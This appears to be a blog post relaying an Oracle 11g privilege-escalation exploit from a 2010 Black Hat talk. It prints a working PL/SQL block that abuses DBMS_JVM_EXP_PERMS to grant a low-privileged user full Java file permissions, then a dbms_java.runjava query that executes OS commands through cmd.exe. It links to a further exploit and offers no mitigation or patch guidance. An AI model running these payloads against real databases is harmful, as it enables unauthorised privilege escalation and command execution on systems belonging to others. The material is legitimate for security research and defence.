Hacking Oracle 11g

<< Back to blog

David Litchfield’s slides from Blackhat DC 2010 are now online. Here is the 0day from his slides, which work even on 11g R2:

Eseentially, because of a flaw in DBMS_JVM_EXP_PERMS package, any user with just create session privileges can grant himself all java privileges.

DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,’java.io.FilePermission’,’<<ALL FILES>>‘,’execute’,’ENABLED’ from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

Once the Java permissions are available, an end user can simple create a procedure and execute OS command from this procedure (http://milw0rm.com/exploits/2837).

However, if the create/execute procedure permissions are not available, David has another way to still execute OS code:

select dbms_java.runjava(‘oracle/aurora/util/Wrapper c:\windows\system32\cmd.exe /c dir>c:\out.lst’)from dual;

Here is the link of the talk video:
https://media.blackhat.com/bh-dc-10/video/Litchfield_David/BlackHat-DC-2010-Litchfield-DefeatSSL-video.mov

———————–
Advert: Testking offers you guaranteed success through use of latest 000-025 questions, 000-076 study guides and 000-081 practice tests.

7 Comments

4 Trackbacks

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>